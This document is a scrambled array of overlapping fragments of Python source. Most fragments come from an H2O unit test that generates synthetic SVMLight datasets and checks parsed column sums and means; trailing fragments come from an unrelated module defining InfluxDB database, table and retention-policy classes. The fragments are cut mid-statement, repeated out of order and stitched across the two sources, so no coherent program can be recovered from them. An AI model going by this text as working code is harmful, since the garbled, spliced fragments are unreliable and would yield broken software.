"h2o_util zeroList = [ 'Result0 = 0', ] # the", "h2o.check_sandbox_for_errors() @classmethod def setUpClass(cls): global SEED, localhost SEED = h2o.setup_random_seed()", "zeroList = [ 'Result0 = 0', ] # the first", "parseResult['destination_key'], max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) num_cols = inspect['num_cols'] num_rows = inspect['num_rows'] print", "# needs y to avoid output column (which can be", "h2o_exec as h2e, h2o_glm import h2o_util zeroList = [ 'Result0", "output class, even if no cols are non-zero # space", "cols\" % (colNumberMax+1, num_cols)) # Exec (column sums)************************************************* if DO_COMPARE_SUM:", "= -36 classMax = 36 dsf = open(csvPathname, \"w+\") synColSumDict", "our fp formats in the syn generation sometimes only have", "\"\\n\") dsf.close() return (colNumberMax, synColSumDict) class Basic(unittest.TestCase): def tearDown(self): h2o.check_sandbox_for_errors()", "sys, time sys.path.extend(['.','..','py']) import h2o, h2o_cmd, h2o_hosts, h2o_browse as h2b,", "= r.triangular(valMin,valMax,0) valFormatted = h2o_util.fp_format(val, sel) # force it to", "num_rows)) # need to fix this for compare to expected", "to expected %0.6f' % (v, compare)) synMean = (v +", "noPrint=True) self.assertEqual(colNumberMax+1, num_cols, msg=\"generated %s cols (including output). parsed to", "though we try to get a max colCount with random,", "300, 'sparse50'), # (100, 40000, 'cD', 300, 'sparse'), ] #", "timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult, noPrint=True) self.assertEqual(colNumberMax+1, num_cols, msg=\"generated %s cols (including output).", "%s rows, parsed to %s rows\" % (rowCount, num_rows)) #", "parseResult['destination_key'] inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) num_cols = inspect['num_cols']", "and (colNumber > colNumberMax): colNumberMax = colNumber else: # some", "% (k, mean, synMean)) num_missing_values = inspect['cols'][k]['num_missing_values'] self.assertEqual(0, num_missing_values, msg='col", "val # sum of column (dict) return val valMin =", "num_rows, msg=\"generated %s rows, parsed to %s rows\" % (rowCount,", "global SEED, localhost SEED = h2o.setup_random_seed() localhost = h2o.decide_if_localhost() if", "\"w+\") synColSumDict = {0: 0} # guaranteed to have col", "+ '/' + csvFilename print \"Creating random\", csvPathname # dict", "really got colNumberMax = 0 for i in range(rowCount): rowData", "def setUpClass(cls): global SEED, localhost SEED = h2o.setup_random_seed() localhost =", "% (SEEDPERFILE, sel, rowCount, colCount) csvPathname = SYNDATASETS_DIR + '/'", "libsvm..doesn't detect automatically\" parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2, timeoutSecs=timeoutSecs, doSummary=False,", "missing values, constant values, # to see if we have", "did we add a val? if val and (colNumber >", "done in same order, so maybe the comparison can be", "def addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict): # colNumber should not", "SYNDATASETS_DIR + '/' + csvFilename print \"Creating random\", csvPathname #", "(v + 0.0)/rowCount # enums don't have mean, but we're", "= colResultList[k] print \"\\nComparing col sums:\", v, compare # Even", "col sums:\", v, compare # Even though we're comparing floating", "synColSumDict[colNumber] = val # sum of column (dict) return val", "colNumber in range(1, colCount+1): val = addRandValToRowStuff(colNumber, valMin, valMax, rowData,", "print \"Parse result['destination_key']:\", parseResult['destination_key'] inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs)", "maxCol=colNumberMax+1, timeoutSecs=timeoutSecs) print \"\\n*************\" print \"colResultList\", colResultList print \"*************\" self.assertEqual(rowCount,", "compare to expected # we should be able to keep", "rowDataCsv = \" \".join(map(str,rowData)) # FIX! vary the eol ?", "column (dict) else: synColSumDict[colNumber] = val # sum of column", "compare # Even though we're comparing floating point sums, the", "be zero in this range. so we don't print zeroes", "rowData, synColSumDict): # colNumber should not be 0, because the", "of fp sums per col above # when we generate", "None else: rowData.append(str(colNumber) + \":\" + valFormatted) # f should", "synColSumDict[0] += val # sum of column (dict) rowDataCsv =", "> valMin/2) and (val < valMax/2): return None else: rowData.append(str(colNumber)", "order, so maybe the comparison can be exact (or not!)", "h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult, noPrint=True) self.assertEqual(colNumberMax+1, num_cols, msg=\"generated %s cols", "above # when we generate the dataset ### print \"\\nsynColSumDict:\",", "# only one value per row! # is it okay", "self.assertEqual(rowCount, num_rows, msg=\"generated %s rows, parsed to %s rows\" %", "separator # add the output (col 0) # random integer", "tearDownClass(cls): h2o.tear_down_cloud() def test_many_fp_formats_libsvm_2(self): # h2b.browseTheCloud() SYNDATASETS_DIR = h2o.make_syn_dir() tryList", "= h2o_util.fp_format(val, sel) # force it to be zero in", "### print \"\\nsynColSumDict:\", synColSumDict for k,v in synColSumDict.iteritems(): if DO_COMPARE_SUM:", "[ 'Result<n> = sum(<keyX>[<col1>])', ] DO_SUMMARY = False DO_COMPARE_SUM =", "# did we add a val? if val and (colNumber", "if DO_COMPARE_SUM: # k should be integers that match the", "dataset ### print \"\\nsynColSumDict:\", synColSumDict for k,v in synColSumDict.iteritems(): if", "configs have the same y..just check with the firs tone", "# to see if we have x specified well #", "comparing floating point sums, the operations probably should have #", "# f should always return string if colNumber in synColSumDict:", "msg=\"generated %s rows, parsed to %s rows\" % (rowCount, num_rows))", "v, compare # Even though we're comparing floating point sums,", "sum of column (dict) return val valMin = -1e2 valMax", "d==0: if distribution == 'sparse': # only one value per", "colNumber # always need an output class, even if no", "SEEDPERFILE = random.randint(0, sys.maxint) csvFilename = \"syn_%s_%s_%s_%s.csv\" % (SEEDPERFILE, sel,", "index or name) # assume all the configs have the", "we generate the dataset ### print \"\\nsynColSumDict:\", synColSumDict for k,v", "we're not enums mean = float(inspect['cols'][k]['mean']) # our fp formats", "dataset requires telling h2o parse it's a libsvm..doesn't detect automatically\"", "per row.. 50% or so? for colNumber in range(1, colCount+1):", "(k, mean, synMean)) num_missing_values = inspect['cols'][k]['num_missing_values'] self.assertEqual(0, num_missing_values, msg='col %s", "0) colNumber = random.randint(1, colCount) val = addRandValToRowStuff(colNumber, valMin, valMax,", "300, 'sparse'), ] # h2b.browseTheCloud() for (rowCount, colCount, hex_key, timeoutSecs,", "print \"This dataset requires telling h2o parse it's a libsvm..doesn't", "have x specified well # figures out everything from parseResult['destination_key']", "the syn generation sometimes only have two places? self.assertAlmostEqual(mean, synMean,", "short # track what max we really got colNumberMax =", "%0.6f' % (v, compare)) synMean = (v + 0.0)/rowCount #", "the first column should use this exprList = [ 'Result<n>", "vary the eol ? # randomly skip some rows. only", "parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2, timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight') print csvFilename,", "generated mean %0.6f' % (k, mean, synMean)) num_missing_values = inspect['cols'][k]['num_missing_values']", "test_many_fp_formats_libsvm_2(self): # h2b.browseTheCloud() SYNDATASETS_DIR = h2o.make_syn_dir() tryList = [ (100,", "column (dict) rowDataCsv = \" \".join(map(str,rowData)) # FIX! vary the", "classMin = -36 classMax = 36 dsf = open(csvPathname, \"w+\")", "# track what max we really got colNumberMax = 0", "col 0 in svm? where does the output data go?", "= random.randint(0,2) if d==0: if distribution == 'sparse': # only", "methods off the r object r = random.Random(SEEDPERFILE) def addRandValToRowStuff(colNumber,", "synColSumDict) if val and (colNumber > colNumberMax): colNumberMax = colNumber", "? # randomly skip some rows. only write 1/3 dsf.write(rowDataCsv", "@classmethod def tearDownClass(cls): h2o.tear_down_cloud() def test_many_fp_formats_libsvm_2(self): # h2b.browseTheCloud() SYNDATASETS_DIR =", "the number of cols self.assertTrue(k>=0 and k<len(colResultList)) compare = colResultList[k]", "should use this exprList = [ 'Result<n> = sum(<keyX>[<col1>])', ]", "return (colNumberMax, synColSumDict) class Basic(unittest.TestCase): def tearDown(self): h2o.check_sandbox_for_errors() @classmethod def", "str(sel) print \"This dataset requires telling h2o parse it's a", "the output data go? (col 0) colNumber = random.randint(1, colCount)", "random\", csvPathname # dict of col sums for comparison to", "# figures out everything from parseResult['destination_key'] # needs y to", "exprList = [ 'Result<n> = sum(<keyX>[<col1>])', ] DO_SUMMARY = False", "SEEDPERFILE, sel, distribution) selKey2 = hex_key + \"_\" + str(sel)", "rows, parsed to %s rows\" % (rowCount, num_rows)) # need", "DO_COMPARE_SUM: h2e.exec_zero_list(zeroList) colResultList = h2e.exec_expr_list_across_cols(None, exprList, selKey2, maxCol=colNumberMax+1, timeoutSecs=timeoutSecs) print", "else: # some number of values per row.. 50% or", "equal to generated mean %0.6f' % (k, mean, synMean)) num_missing_values", "sum is not equal to expected %0.6f' % (v, compare))", "DO_COMPARE_SUM = False def write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution):", "if val and (colNumber > colNumberMax): colNumberMax = colNumber #", "will be there ## val = r.uniform(MIN,MAX) val = r.triangular(valMin,valMax,0)", "a libsvm..doesn't detect automatically\" parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2, timeoutSecs=timeoutSecs,", "add a val? if val and (colNumber > colNumberMax): colNumberMax", "h2o_hosts, h2o_browse as h2b, h2o_import as h2i, h2o_exec as h2e,", "with the firs tone goodX = h2o_glm.goodXFromColumnInfo(y=0, key=parseResult['destination_key'], timeoutSecs=300, noPrint=True)", "as h2b, h2o_import as h2i, h2o_exec as h2e, h2o_glm import", "## val = r.uniform(MIN,MAX) val = r.triangular(valMin,valMax,0) valFormatted = h2o_util.fp_format(val,", "num_missing_values = inspect['cols'][k]['num_missing_values'] self.assertEqual(0, num_missing_values, msg='col %s num_missing_values %d should", "though we're comparing floating point sums, the operations probably should", "should be integers that match the number of cols self.assertTrue(k>=0", "only one value per row! # is it okay to", "random integer for class val = random.randint(classMin,classMax) rowData.insert(0, val) synColSumDict[0]", "integers that match the number of cols self.assertTrue(k>=0 and k<len(colResultList))", "non-zero # space is the only valid separator # add", "colNumber = random.randint(1, colCount) val = addRandValToRowStuff(colNumber, valMin, valMax, rowData,", "h2b.browseTheCloud() SYNDATASETS_DIR = h2o.make_syn_dir() tryList = [ (100, 10000, 'cA',", "valMax = 1e2 classMin = -36 classMax = 36 dsf", "be integers that match the number of cols self.assertTrue(k>=0 and", "# gives us some reporting on missing values, constant values,", "# even though we try to get a max colCount", "SEED = h2o.setup_random_seed() localhost = h2o.decide_if_localhost() if (localhost): h2o.build_cloud(2,java_heap_GB=5) else:", "= hex_key + \"_\" + str(sel) print \"This dataset requires", "this range. so we don't print zeroes for svm! if", "(including output). parsed to %s cols\" % (colNumberMax+1, num_cols)) #", "h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2, timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight') print csvFilename, 'parse time:',", "should be able to keep the list of fp sums", "sum of column (dict) rowDataCsv = \" \".join(map(str,rowData)) # FIX!", "to have col 0 for output # even though we", "rowData, synColSumDict) if val and (colNumber > colNumberMax): colNumberMax =", "distribution) selKey2 = hex_key + \"_\" + str(sel) print \"This", "{0: 0} # guaranteed to have col 0 for output", "= h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2, timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight') print csvFilename, 'parse", "max we really got colNumberMax = 0 for i in", "only valid separator # add the output (col 0) #", "\".join(map(str,rowData)) # FIX! vary the eol ? # randomly skip", "colCount) csvPathname = SYNDATASETS_DIR + '/' + csvFilename print \"Creating", "1/3 dsf.write(rowDataCsv + \"\\n\") dsf.close() return (colNumberMax, synColSumDict) class Basic(unittest.TestCase):", "'sparse'), # (100, 40000, 'cC', 300, 'sparse50'), # (100, 40000,", "have # been done in same order, so maybe the", "# need to fix this for compare to expected #", "addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) # did we add a", "DO_COMPARE_SUM: # k should be integers that match the number", "reporting on missing values, constant values, # to see if", "+ csvFilename print \"Creating random\", csvPathname # dict of col", "match the number of cols self.assertTrue(k>=0 and k<len(colResultList)) compare =", "only have two places? self.assertAlmostEqual(mean, synMean, places=0, msg='col %s mean", "inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) num_cols = inspect['num_cols'] num_rows", "+ csvFilename # SUMMARY**************************************** # gives us some reporting on", "\"_\" + str(sel) print \"This dataset requires telling h2o parse", "parsed to %s cols\" % (colNumberMax+1, num_cols)) # Exec (column", "point sums, the operations probably should have # been done", "0} # guaranteed to have col 0 for output #", "self.assertTrue(k>=0 and k<len(colResultList)) compare = colResultList[k] print \"\\nComparing col sums:\",", "colNumberMax = colNumber else: # some number of values per", "'sparse': # only one value per row! # is it", "[] d = random.randint(0,2) if d==0: if distribution == 'sparse':", "colCount, SEEDPERFILE, sel, distribution): # we can do all sorts", "column (dict) return val valMin = -1e2 valMax = 1e2", "is it okay to specify col 0 in svm? where", "class, even if no cols are non-zero # space is", "k,v in synColSumDict.iteritems(): if DO_COMPARE_SUM: # k should be integers", "val # sum of column (dict) else: synColSumDict[colNumber] = val", "max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) num_cols = inspect['num_cols'] num_rows = inspect['num_rows'] print \"\\n\"", "col sum is not equal to expected %0.6f' % (v,", "or name) # assume all the configs have the same", "should be 0' % (k, num_missing_values)) if __name__ == '__main__':", "= 1e2 classMin = -36 classMax = 36 dsf =", "on missing values, constant values, # to see if we", "to avoid output column (which can be index or name)", "dsf.close() return (colNumberMax, synColSumDict) class Basic(unittest.TestCase): def tearDown(self): h2o.check_sandbox_for_errors() @classmethod", "doSummary=False, parser_type='SVMLight') print csvFilename, 'parse time:', parseResult['response']['time'] print \"Parse result['destination_key']:\",", "inspect['num_cols'] num_rows = inspect['num_rows'] print \"\\n\" + csvFilename # SUMMARY****************************************", "column (which can be index or name) # assume all", "(v, compare)) synMean = (v + 0.0)/rowCount # enums don't", "r = random.Random(SEEDPERFILE) def addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict): #", "col sums for comparison to exec col sums below (colNumberMax,", "sorts of methods off the r object r = random.Random(SEEDPERFILE)", "this exprList = [ 'Result<n> = sum(<keyX>[<col1>])', ] DO_SUMMARY =", "# enums don't have mean, but we're not enums mean", "the only valid separator # add the output (col 0)", "if distribution == 'sparse': # only one value per row!", "\"Creating random\", csvPathname # dict of col sums for comparison", "selKey2 = hex_key + \"_\" + str(sel) print \"This dataset", "not!) self.assertAlmostEqual(v, compare, places=0, msg='%0.6f col sum is not equal", "sel) # force it to be zero in this range.", "'cB', 300, 'sparse'), # (100, 40000, 'cC', 300, 'sparse50'), #", "[ (100, 10000, 'cA', 300, 'sparse50'), (100, 10000, 'cB', 300,", "synColSumDict.iteritems(): if DO_COMPARE_SUM: # k should be integers that match", "the dataset ### print \"\\nsynColSumDict:\", synColSumDict for k,v in synColSumDict.iteritems():", "# Exec (column sums)************************************************* if DO_COMPARE_SUM: h2e.exec_zero_list(zeroList) colResultList = h2e.exec_expr_list_across_cols(None,", "rows\" % (rowCount, num_rows)) # need to fix this for", "don't print zeroes for svm! if (val > valMin/2) and", "False DO_COMPARE_SUM = False def write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel,", "what max we really got colNumberMax = 0 for i", "\" \".join(map(str,rowData)) # FIX! vary the eol ? # randomly", "the same y..just check with the firs tone goodX =", "we should be able to keep the list of fp", "for sel in [random.randint(0,NUM_CASES-1)]: # len(caseList) SEEDPERFILE = random.randint(0, sys.maxint)", "output (col 0) # random integer for class val =", "should always return string if colNumber in synColSumDict: synColSumDict[colNumber] +=", "get a max colCount with random, we might fall short", "distribution == 'sparse': # only one value per row! #", "synMean)) num_missing_values = inspect['cols'][k]['num_missing_values'] self.assertEqual(0, num_missing_values, msg='col %s num_missing_values %d", "in synColSumDict: synColSumDict[colNumber] += val # sum of column (dict)", "output column (which can be index or name) # assume", "(col 0) # random integer for class val = random.randint(classMin,classMax)", "for k,v in synColSumDict.iteritems(): if DO_COMPARE_SUM: # k should be", "for i in range(rowCount): rowData = [] d = random.randint(0,2)", "h2o.build_cloud(2,java_heap_GB=5) else: h2o_hosts.build_cloud_with_hosts() @classmethod def tearDownClass(cls): h2o.tear_down_cloud() def test_many_fp_formats_libsvm_2(self): #", "y to avoid output column (which can be index or", "for colNumber in range(1, colCount+1): val = addRandValToRowStuff(colNumber, valMin, valMax,", "h2o_glm import h2o_util zeroList = [ 'Result0 = 0', ]", "val valMin = -1e2 valMax = 1e2 classMin = -36", "= h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult, noPrint=True) self.assertEqual(colNumberMax+1, num_cols, msg=\"generated %s", "force it to be zero in this range. so we", "# h2b.browseTheCloud() for (rowCount, colCount, hex_key, timeoutSecs, distribution) in tryList:", "everything from parseResult['destination_key'] # needs y to avoid output column", "range(1, colCount+1): val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) if", "there ## val = r.uniform(MIN,MAX) val = r.triangular(valMin,valMax,0) valFormatted =", "import h2o, h2o_cmd, h2o_hosts, h2o_browse as h2b, h2o_import as h2i,", "colNumberMax): colNumberMax = colNumber else: # some number of values", "addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict): # colNumber should not be", "print \"Creating random\", csvPathname # dict of col sums for", "= random.randint(classMin,classMax) rowData.insert(0, val) synColSumDict[0] += val # sum of", "result['destination_key']:\", parseResult['destination_key'] inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) num_cols =", "hex_key=selKey2, timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight') print csvFilename, 'parse time:', parseResult['response']['time'] print", "some reporting on missing values, constant values, # to see", "Basic(unittest.TestCase): def tearDown(self): h2o.check_sandbox_for_errors() @classmethod def setUpClass(cls): global SEED, localhost", "if DO_COMPARE_SUM: h2e.exec_zero_list(zeroList) colResultList = h2e.exec_expr_list_across_cols(None, exprList, selKey2, maxCol=colNumberMax+1, timeoutSecs=timeoutSecs)", "[ 'Result0 = 0', ] # the first column should", "number of values per row.. 50% or so? for colNumber", "timeoutSecs=timeoutSecs) num_cols = inspect['num_cols'] num_rows = inspect['num_rows'] print \"\\n\" +", "colNumberMax = colNumber # always need an output class, even", "# sum of column (dict) return val valMin = -1e2", "track what max we really got colNumberMax = 0 for", "rowCount, colCount) csvPathname = SYNDATASETS_DIR + '/' + csvFilename print", "figures out everything from parseResult['destination_key'] # needs y to avoid", "list of fp sums per col above # when we", "for comparison to exec col sums below (colNumberMax, synColSumDict) =", "output will be there ## val = r.uniform(MIN,MAX) val =", "+ \":\" + valFormatted) # f should always return string", "= \"syn_%s_%s_%s_%s.csv\" % (SEEDPERFILE, sel, rowCount, colCount) csvPathname = SYNDATASETS_DIR", "parse it's a libsvm..doesn't detect automatically\" parseResult = h2i.import_parse(path=csvPathname, schema='put',", "all sorts of methods off the r object r =", "msg='col %s num_missing_values %d should be 0' % (k, num_missing_values))", "sum of column (dict) else: synColSumDict[colNumber] = val # sum", "= open(csvPathname, \"w+\") synColSumDict = {0: 0} # guaranteed to", "50% or so? for colNumber in range(1, colCount+1): val =", "always return string if colNumber in synColSumDict: synColSumDict[colNumber] += val", "that match the number of cols self.assertTrue(k>=0 and k<len(colResultList)) compare", "to be zero in this range. so we don't print", "= [] d = random.randint(0,2) if d==0: if distribution ==", "inspect['cols'][k]['num_missing_values'] self.assertEqual(0, num_missing_values, msg='col %s num_missing_values %d should be 0'", "or so? for colNumber in range(1, colCount+1): val = addRandValToRowStuff(colNumber,", "# always need an output class, even if no cols", "for svm! if (val > valMin/2) and (val < valMax/2):", "h2o.setup_random_seed() localhost = h2o.decide_if_localhost() if (localhost): h2o.build_cloud(2,java_heap_GB=5) else: h2o_hosts.build_cloud_with_hosts() @classmethod", "len(caseList) SEEDPERFILE = random.randint(0, sys.maxint) csvFilename = \"syn_%s_%s_%s_%s.csv\" % (SEEDPERFILE,", "csvFilename print \"Creating random\", csvPathname # dict of col sums", "be 0, because the output will be there ## val", "valMin, valMax, rowData, synColSumDict) # did we add a val?", "(localhost): h2o.build_cloud(2,java_heap_GB=5) else: h2o_hosts.build_cloud_with_hosts() @classmethod def tearDownClass(cls): h2o.tear_down_cloud() def test_many_fp_formats_libsvm_2(self):", "+= val # sum of column (dict) else: synColSumDict[colNumber] =", "we're comparing floating point sums, the operations probably should have", "= r.uniform(MIN,MAX) val = r.triangular(valMin,valMax,0) valFormatted = h2o_util.fp_format(val, sel) #", "valMax/2): return None else: rowData.append(str(colNumber) + \":\" + valFormatted) #", "dsf.write(rowDataCsv + \"\\n\") dsf.close() return (colNumberMax, synColSumDict) class Basic(unittest.TestCase): def", "(100, 40000, 'cD', 300, 'sparse'), ] # h2b.browseTheCloud() for (rowCount,", "%0.6f' % (k, mean, synMean)) num_missing_values = inspect['cols'][k]['num_missing_values'] self.assertEqual(0, num_missing_values,", "when we generate the dataset ### print \"\\nsynColSumDict:\", synColSumDict for", "= [ 'Result<n> = sum(<keyX>[<col1>])', ] DO_SUMMARY = False DO_COMPARE_SUM", "= h2o_glm.goodXFromColumnInfo(y=0, key=parseResult['destination_key'], timeoutSecs=300, noPrint=True) if DO_SUMMARY: summaryResult = h2o_cmd.runSummary(key=selKey2,", "h2o_browse as h2b, h2o_import as h2i, h2o_exec as h2e, h2o_glm", "the eol ? # randomly skip some rows. only write", "to %s rows\" % (rowCount, num_rows)) # need to fix", "# some number of values per row.. 50% or so?", "in synColSumDict.iteritems(): if DO_COMPARE_SUM: # k should be integers that", "keep the list of fp sums per col above #", "in same order, so maybe the comparison can be exact", "in this range. so we don't print zeroes for svm!", "(colNumber > colNumberMax): colNumberMax = colNumber else: # some number", "sum(<keyX>[<col1>])', ] DO_SUMMARY = False DO_COMPARE_SUM = False def write_syn_dataset(csvPathname,", "= False DO_COMPARE_SUM = False def write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE,", "csvFilename = \"syn_%s_%s_%s_%s.csv\" % (SEEDPERFILE, sel, rowCount, colCount) csvPathname =", "sums per col above # when we generate the dataset", "self.assertEqual(0, num_missing_values, msg='col %s num_missing_values %d should be 0' %", "be exact (or not!) self.assertAlmostEqual(v, compare, places=0, msg='%0.6f col sum", "-36 classMax = 36 dsf = open(csvPathname, \"w+\") synColSumDict =", "even if no cols are non-zero # space is the", "# our fp formats in the syn generation sometimes only", "+ valFormatted) # f should always return string if colNumber", "if no cols are non-zero # space is the only", "colNumber should not be 0, because the output will be", "x specified well # figures out everything from parseResult['destination_key'] #", "goodX = h2o_glm.goodXFromColumnInfo(y=0, key=parseResult['destination_key'], timeoutSecs=300, noPrint=True) if DO_SUMMARY: summaryResult =", "0, because the output will be there ## val =", "# k should be integers that match the number of", "0) # random integer for class val = random.randint(classMin,classMax) rowData.insert(0,", "sums)************************************************* if DO_COMPARE_SUM: h2e.exec_zero_list(zeroList) colResultList = h2e.exec_expr_list_across_cols(None, exprList, selKey2, maxCol=colNumberMax+1,", "300, 'sparse50'), (100, 10000, 'cB', 300, 'sparse'), # (100, 40000,", "\"\\nComparing col sums:\", v, compare # Even though we're comparing", "rowCount, colCount, SEEDPERFILE, sel, distribution): # we can do all", "'sparse50'), # (100, 40000, 'cD', 300, 'sparse'), ] # h2b.browseTheCloud()", "colNumber else: # some number of values per row.. 50%", "distribution): # we can do all sorts of methods off", "maybe the comparison can be exact (or not!) self.assertAlmostEqual(v, compare,", "# random integer for class val = random.randint(classMin,classMax) rowData.insert(0, val)", "FIX! vary the eol ? # randomly skip some rows.", "some number of values per row.. 50% or so? for", "cols (including output). parsed to %s cols\" % (colNumberMax+1, num_cols))", "can be exact (or not!) self.assertAlmostEqual(v, compare, places=0, msg='%0.6f col", "have the same y..just check with the firs tone goodX", "(100, 10000, 'cA', 300, 'sparse50'), (100, 10000, 'cB', 300, 'sparse'),", "be there ## val = r.uniform(MIN,MAX) val = r.triangular(valMin,valMax,0) valFormatted", "space is the only valid separator # add the output", "self.assertEqual(colNumberMax+1, num_cols, msg=\"generated %s cols (including output). parsed to %s", "first column should use this exprList = [ 'Result<n> =", "distribution) in tryList: NUM_CASES = h2o_util.fp_format() for sel in [random.randint(0,NUM_CASES-1)]:", "but we're not enums mean = float(inspect['cols'][k]['mean']) # our fp", "be 0' % (k, num_missing_values)) if __name__ == '__main__': h2o.unit_main()", "i in range(rowCount): rowData = [] d = random.randint(0,2) if", "of cols self.assertTrue(k>=0 and k<len(colResultList)) compare = colResultList[k] print \"\\nComparing", "parseResult['destination_key'] # needs y to avoid output column (which can", "integer for class val = random.randint(classMin,classMax) rowData.insert(0, val) synColSumDict[0] +=", "10000, 'cA', 300, 'sparse50'), (100, 10000, 'cB', 300, 'sparse'), #", "of column (dict) else: synColSumDict[colNumber] = val # sum of", "timeoutSecs, distribution) in tryList: NUM_CASES = h2o_util.fp_format() for sel in", "h2o_cmd.runInspect(None, parseResult['destination_key'], max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) num_cols = inspect['num_cols'] num_rows = inspect['num_rows']", "us some reporting on missing values, constant values, # to", "\"\\nsynColSumDict:\", synColSumDict for k,v in synColSumDict.iteritems(): if DO_COMPARE_SUM: # k", "'cD', 300, 'sparse'), ] # h2b.browseTheCloud() for (rowCount, colCount, hex_key,", "to specify col 0 in svm? where does the output", "sel in [random.randint(0,NUM_CASES-1)]: # len(caseList) SEEDPERFILE = random.randint(0, sys.maxint) csvFilename", "for compare to expected # we should be able to", "mean %0.6f is not equal to generated mean %0.6f' %", "h2o, h2o_cmd, h2o_hosts, h2o_browse as h2b, h2o_import as h2i, h2o_exec", "colResultList[k] print \"\\nComparing col sums:\", v, compare # Even though", "max colCount with random, we might fall short # track", "def tearDownClass(cls): h2o.tear_down_cloud() def test_many_fp_formats_libsvm_2(self): # h2b.browseTheCloud() SYNDATASETS_DIR = h2o.make_syn_dir()", "we add a val? if val and (colNumber > colNumberMax):", "h2e, h2o_glm import h2o_util zeroList = [ 'Result0 = 0',", "SUMMARY**************************************** # gives us some reporting on missing values, constant", "(or not!) self.assertAlmostEqual(v, compare, places=0, msg='%0.6f col sum is not", "# Even though we're comparing floating point sums, the operations", "zero in this range. so we don't print zeroes for", "does the output data go? (col 0) colNumber = random.randint(1,", "%s cols\" % (colNumberMax+1, num_cols)) # Exec (column sums)************************************************* if", "to %s cols\" % (colNumberMax+1, num_cols)) # Exec (column sums)*************************************************", "name) # assume all the configs have the same y..just", "hex_key + \"_\" + str(sel) print \"This dataset requires telling", "@classmethod def setUpClass(cls): global SEED, localhost SEED = h2o.setup_random_seed() localhost", "data go? (col 0) colNumber = random.randint(1, colCount) val =", "only write 1/3 dsf.write(rowDataCsv + \"\\n\") dsf.close() return (colNumberMax, synColSumDict)", "(SEEDPERFILE, sel, rowCount, colCount) csvPathname = SYNDATASETS_DIR + '/' +", "+ str(sel) print \"This dataset requires telling h2o parse it's", "h2e.exec_zero_list(zeroList) colResultList = h2e.exec_expr_list_across_cols(None, exprList, selKey2, maxCol=colNumberMax+1, timeoutSecs=timeoutSecs) print \"\\n*************\"", "Exec (column sums)************************************************* if DO_COMPARE_SUM: h2e.exec_zero_list(zeroList) colResultList = h2e.exec_expr_list_across_cols(None, exprList,", "compare, places=0, msg='%0.6f col sum is not equal to expected", "h2o_cmd, h2o_hosts, h2o_browse as h2b, h2o_import as h2i, h2o_exec as" ]
[ "- name of table fields - dict of field name", "from utils.influx_utils import InfluxUtils from utils.spp_utils import SppUtils @unique class", "continuous_queries(self) -> Set[Queries.ContinuousQuery]: \"\"\"Set of all provided Continuous Queries\"\"\" return", "json from typing import Any, Dict, List, Set, Tuple, Union", "is declared afer which ammount of time a dataset is", "table, otherwise new empty table \"\"\" return self.tables.get(table_name, Table(self, table_name))", "{Table} -- Table with predefined set of tags and fields", "a pre-defined set of tags, fields and a timestamp. \"\"\"", "o.to_dict() == self.to_dict() return False def __hash__(self) -> int: return", "= [] if(not retention_policy): retention_policy = next(filter(lambda rp: rp.default, database.retention_policies))", "dict, we only need the keys fields: Dict[str, Any] =", "utils.execption_utils import ExceptionUtils from utils.influx_utils import InfluxUtils from utils.spp_utils import", "of method self.__duration: str = InfluxUtils.transform_time_literal(duration, single_vals=False) except ValueError as", "the influx database. Classes: Datatype Database Table RetentionPolicy \"\"\" from", "the default RP Methods to_dict - creates a dict out", "a int is not a bool. Important: only use `TIME`", "database(self) -> Database: \"\"\"table is declared within this database\"\"\" return", "database(self) -> Database: \"\"\"associated database\"\"\" return self.__database @property def duration(self)", "def __init__(self, name: str): self.__name: str = name self.__tables: Dict[str,", "of field name with datatype tags - tags as list", "database. Classes: Datatype Database Table RetentionPolicy \"\"\" from __future__ import", "associated database duration - time until the data is purged", "if time_stamp_field is not used yet, overwrite sppmonCaptureTime or others", "retention_policy = next(filter(lambda rp: rp.default, database.retention_policies)) self.__database: Database = database", "with this table\"\"\" return self.__retention_policy @property def database(self) -> Database:", "-> Database: \"\"\"associated database\"\"\" return self.__database @property def duration(self) ->", "and drop field else: continue # Otherwise check for Keys", "the table, name is key, value is datatype\"\"\" return self.__fields", "time_stamp_field): continue else: ExceptionUtils.error_message(f\"Not all columns for table {self.name} are", "- tags as list of str time_key - key name", "policy database for creation\") if(not duration): raise ValueError(\"need retention policy", "fields and a timestamp. \"\"\" @property def fields(self) -> Dict[str,", "will produce a warning. This function uses the tag/field and", "of str time_key - key name of the timestamp field", "import SppUtils @unique class Datatype(Enum): \"\"\" This enum differentiates between", "= value # if time_stamp_field is not used yet, overwrite", "time_stamp_field = self.time_key # helper variable to only overwrite if", "- Set of all provided Retention Policies continuous_queries - Set", "name): 